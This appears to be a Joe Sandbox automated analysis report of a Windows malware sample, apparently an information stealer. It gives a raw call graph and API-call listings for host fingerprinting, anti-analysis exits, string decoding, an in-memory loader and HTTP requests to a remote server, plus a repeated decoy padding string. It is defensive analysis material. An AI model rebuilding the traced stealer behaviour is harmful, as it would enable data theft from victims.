27305 41a8a0 lstrcpy 27302->27305 27303 41a7a0 lstrcpy 27303->27330 27306 415805 27304->27306 27307 41599d 27305->27307 27308 401670 lstrcpy 27306->27308 27310 41a820 2 API calls 27307->27310 27328 415811 27308->27328 27309 41a740 lstrcpy 27309->27330 27312 4159ab 27310->27312 27311 415a0b StrCmpCA 27313 415a16 Sleep 27311->27313 27314 415a28 27311->27314 27315 41a820 2 API calls 27312->27315 27313->27330 27316 41a8a0 lstrcpy 27314->27316 27317 4159ba 27315->27317 27319 415a34 27316->27319 27318 401670 lstrcpy 27317->27318 27318->27328 27320 41a820 2 API calls 27319->27320 27321 415a43 27320->27321 27323 41a820 2 API calls 27321->27323 27322 4152c0 29 API calls 27322->27330 27324 415a52 27323->27324 27326 401670 lstrcpy 27324->27326 27325 41578a StrCmpCA 27325->27330 27326->27328 27327 41593f StrCmpCA 27327->27330 27328->26385 27329 4151f0 23 API calls 27329->27330 27330->27292 27330->27293 27330->27296 27330->27298 27330->27301 27330->27303 27330->27309 27330->27311 27330->27322 27330->27325 27330->27327 27330->27329 27331 41a8a0 lstrcpy 27330->27331 27331->27330 27333 417553 GetVolumeInformationA 27332->27333 27334 41754c 27332->27334 27335 417591 27333->27335 27334->27333 27336 4175fc GetProcessHeap HeapAlloc 27335->27336 27337 417619 27336->27337 27338 417628 wsprintfA 27336->27338 27339 41a740 lstrcpy 27337->27339 27340 41a740 lstrcpy 27338->27340 27341 415da7 27339->27341 27340->27341 27341->26406 27343 41a7a0 lstrcpy 27342->27343 27344 404899 27343->27344 27550 4047b0 27344->27550 27346 4048a5 27347 41a740 lstrcpy 27346->27347 27348 4048d7 27347->27348 27349 41a740 lstrcpy 27348->27349 27350 4048e4 27349->27350 27351 41a740 lstrcpy 27350->27351 27352 4048f1 27351->27352 27353 41a740 lstrcpy 27352->27353 27354 4048fe 27353->27354 27355 41a740 lstrcpy 27354->27355 27356 40490b InternetOpenA StrCmpCA 27355->27356 27357 404944 27356->27357 27358 404955 27357->27358 27359 404ecb InternetCloseHandle 27357->27359 27563 418b60 GetSystemTime lstrcpy lstrcpy 27358->27563 27361 404ee8 27359->27361 27558 409ac0 CryptStringToBinaryA 27361->27558 27362 404963 27564 41a920 lstrcpy lstrcpy lstrcatA 27362->27564 27365 404976 27367 41a8a0 lstrcpy 27365->27367 27372 40497f 27367->27372 27368 41a820 2 API calls 27369 404f05 27368->27369 27371 41a9b0 4 API calls 27369->27371 27370 404f27 codecvt 27374 41a7a0 lstrcpy 27370->27374 27373 404f1b 27371->27373 27376 41a9b0 4 API calls 27372->27376 27375 41a8a0 lstrcpy 27373->27375 27387 404f57 27374->27387 27375->27370 27377 4049a9 27376->27377 27378 41a8a0 lstrcpy 27377->27378 27379 4049b2 27378->27379 27380 41a9b0 4 API calls 27379->27380 27381 4049d1 27380->27381 27382 41a8a0 lstrcpy 27381->27382 27383 4049da 27382->27383 27565 41a920 lstrcpy lstrcpy lstrcatA 27383->27565 27385 4049f8 27386 41a8a0 lstrcpy 27385->27386 27388 404a01 27386->27388 27387->26409 27389 41a9b0 4 API calls 27388->27389 27390 404a20 27389->27390 27391 41a8a0 lstrcpy 27390->27391 27392 404a29 27391->27392 27393 41a9b0 4 API calls 27392->27393 27394 404a48 27393->27394 27395 41a8a0 lstrcpy 27394->27395 27396 404a51 27395->27396 27397 41a9b0 4 API calls 27396->27397 27398 404a7d 27397->27398 27566 41a920 lstrcpy lstrcpy lstrcatA 27398->27566 27400 404a84 27401 41a8a0 lstrcpy 27400->27401 27402 404a8d 27401->27402 27403 404aa3 InternetConnectA 27402->27403 27403->27359 27404 404ad3 HttpOpenRequestA 27403->27404 27406 404b28 27404->27406 27407 404ebe InternetCloseHandle 27404->27407 27408 41a9b0 4 API calls 27406->27408 27407->27359 27409 404b3c 27408->27409 27410 41a8a0 lstrcpy 27409->27410 27411 404b45 27410->27411 27567 41a920 lstrcpy lstrcpy lstrcatA 27411->27567 27413 404b63 27414 41a8a0 lstrcpy 27413->27414 27415 404b6c 27414->27415 27416 41a9b0 4 API calls 27415->27416 27417 404b8b 27416->27417 27418 41a8a0 lstrcpy 27417->27418 27419 404b94 27418->27419 27420 41a9b0 4 API calls 27419->27420 27421 404bb5 27420->27421 27422 41a8a0 lstrcpy 27421->27422 27423 404bbe 27422->27423 27424 41a9b0 4 API calls 27423->27424 27425 404bde 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 404be7 27426->27427 27428 41a9b0 4 API calls 27427->27428 27429 404c06 27428->27429 27430 41a8a0 lstrcpy 27429->27430 27431 404c0f 27430->27431 27568 41a920 lstrcpy lstrcpy lstrcatA 27431->27568 27433 404c2d 27434 41a8a0 lstrcpy 27433->27434 27435 404c36 27434->27435 27436 41a9b0 4 API calls 27435->27436 27437 404c55 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404c5e 27438->27439 27440 41a9b0 4 API calls 27439->27440 27441 404c7d 27440->27441 27442 41a8a0 lstrcpy 27441->27442 27443 404c86 27442->27443 27569 41a920 lstrcpy lstrcpy lstrcatA 27443->27569 27445 404ca4 27446 41a8a0 lstrcpy 27445->27446 27447 404cad 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 404ccc 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404cd5 27450->27451 27452 41a9b0 4 API calls 27451->27452 27453 404cf6 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404cff 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404d1f 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404d28 27458->27459 27460 41a9b0 4 API calls 27459->27460 27461 404d47 27460->27461 27462 41a8a0 lstrcpy 27461->27462 27463 404d50 27462->27463 27570 41a920 lstrcpy lstrcpy lstrcatA 27463->27570 27465 404d6e 27466 41a8a0 lstrcpy 27465->27466 27467 404d77 27466->27467 27468 41a740 lstrcpy 27467->27468 27469 404d92 27468->27469 27571 41a920 lstrcpy lstrcpy lstrcatA 27469->27571 27471 404db3 27572 41a920 lstrcpy lstrcpy lstrcatA 27471->27572 27473 404dba 27474 41a8a0 lstrcpy 27473->27474 27475 404dc6 27474->27475 27476 404de7 lstrlenA 27475->27476 27477 404dfa 27476->27477 27478 404e03 lstrlenA 27477->27478 27573 41aad0 27478->27573 27480 404e13 HttpSendRequestA 27481 404e32 InternetReadFile 27480->27481 27482 404e67 InternetCloseHandle 27481->27482 27487 404e5e 27481->27487 27484 41a800 27482->27484 27484->27407 27485 41a9b0 4 API calls 27485->27487 27486 41a8a0 lstrcpy 27486->27487 27487->27481 27487->27482 27487->27485 27487->27486 27578 41aad0 27488->27578 27490 4117c4 StrCmpCA 27491 4117d7 27490->27491 27492 4117cf ExitProcess 27490->27492 27493 4117e7 strtok_s 27491->27493 27496 4117f4 27493->27496 27494 4119c2 27494->26411 27495 41199e strtok_s 27495->27496 27496->27494 27496->27495 27497 4118ad StrCmpCA 27496->27497 27498 4118cf StrCmpCA 27496->27498 27499 4118f1 StrCmpCA 27496->27499 27500 411951 StrCmpCA 27496->27500 27501 411970 StrCmpCA 27496->27501 27502 411913 StrCmpCA 27496->27502 27503 411932 StrCmpCA 27496->27503 27504 41185d StrCmpCA 27496->27504 27505 41187f StrCmpCA 27496->27505 27506 41a820 2 API calls 27496->27506 27507 41a820 lstrlenA lstrcpy 27496->27507 27497->27496 27498->27496 27499->27496 27500->27496 27501->27496 27502->27496 27503->27496 27504->27496 27505->27496 27506->27495 27507->27496 27508->26417 27509->26419 27510->26425 27511->26427 27512->26433 27513->26435 27514->26439 27515->26443 27516->26447 27517->26453 27518->26455 27519->26459 27520->26473 27521->26477 27522->26476 27523->26472 27524->26476 27525->26494 27526->26479 27527->26483 27528->26484 27529->26490 27530->26491 27531->26497 27532->26504 27533->26506 27534->26530 27535->26533 27536->26534 27537->26529 27538->26534 27539->26543 27542 41a7a0 lstrcpy 27541->27542 27543 401683 27542->27543 27544 41a7a0 lstrcpy 27543->27544 27545 401695 27544->27545 27546 41a7a0 lstrcpy 27545->27546 27547 4016a7 27546->27547 27548 41a7a0 lstrcpy 27547->27548 27549 4015a3 27548->27549 27549->27269 27574 401030 27550->27574 27554 404838 lstrlenA 27577 41aad0 27554->27577 27556 404848 InternetCrackUrlA 27557 404867 27556->27557 27557->27346 27559 409af9 LocalAlloc 27558->27559 27560 404eee 27558->27560 27559->27560 27561 409b14 CryptStringToBinaryA 27559->27561 27560->27368 27560->27370 27561->27560 27562 409b39 LocalFree 27561->27562 27562->27560 27563->27362 27564->27365 27565->27385 27566->27400 27567->27413 27568->27433 27569->27445 27570->27465 27571->27471 27572->27473 27573->27480 27575 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27574->27575 27576 41aad0 27575->27576 27576->27554 27577->27556 27578->27490 27716 416ab1 902 API calls 27679 4069f3 7 API calls 27579 b00005 27584 b0092b GetPEB 27579->27584 27581 b00030 27585 b0003c 27581->27585 27584->27581 27586 b00049 27585->27586 27600 b00e0f SetErrorMode SetErrorMode 27586->27600 27591 b00265 27592 b002ce VirtualProtect 27591->27592 27594 b0030b 27592->27594 27593 b00439 VirtualFree 27598 b005f4 LoadLibraryA 27593->27598 27599 b004be 27593->27599 27594->27593 27595 b004e3 LoadLibraryA 27595->27599 27597 b008c7 27598->27597 27599->27595 27599->27598 27601 b00223 27600->27601 27602 b00d90 27601->27602 27603 b00dad 27602->27603 27604 b00dbb GetPEB 27603->27604 27605 b00238 VirtualAlloc 27603->27605 27604->27605 27605->27591 27680 b1d106 41 API calls __amsg_exit 27718 b16a0a ExitProcess 27719 41cafe 219 API calls 4 library calls 27720 b1cd97 170 API calls 2 library calls 27721 b1be78 162 API calls 2 library calls 26150 401190 26157 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26150->26157 26152 40119e 26153 4011cc 26152->26153 26159 417850 GetProcessHeap HeapAlloc GetUserNameA 26152->26159 26155 4011b7 26155->26153 26156 4011c4 ExitProcess 26155->26156 26158 417939 26157->26158 26158->26152 26160 4178c3 26159->26160 26160->26155 27654 b13823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27684 b0fd67 152 API calls 27722 41ce9f 69 API calls __amsg_exit 27655 b13823 6 API calls 27656 b1140b strtok_s 27657 4088a4 RaiseException task __CxxThrowException@8 27658 4180a5 GetProcessHeap HeapFree 27659 b16c57 692 API calls 27660 b1102b StrCmpCA strtok_s lstrlen lstrcpy 27687 b16d18 646 API calls 27689 41b9b0 RtlUnwind 27724 b16a40 6 API calls 27725 b13b7d 91 API calls 2 library calls

                                                                                  Executed Functions

                                                                                  Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                                                  • strlen.MSVCRT ref: 004046F0
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                                                  Strings
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                  • API String ID: 2127927946-2218711628
                                                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                                                  Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                  • String ID:
                                                                                  • API String ID: 1206570057-0
                                                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                                                  Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
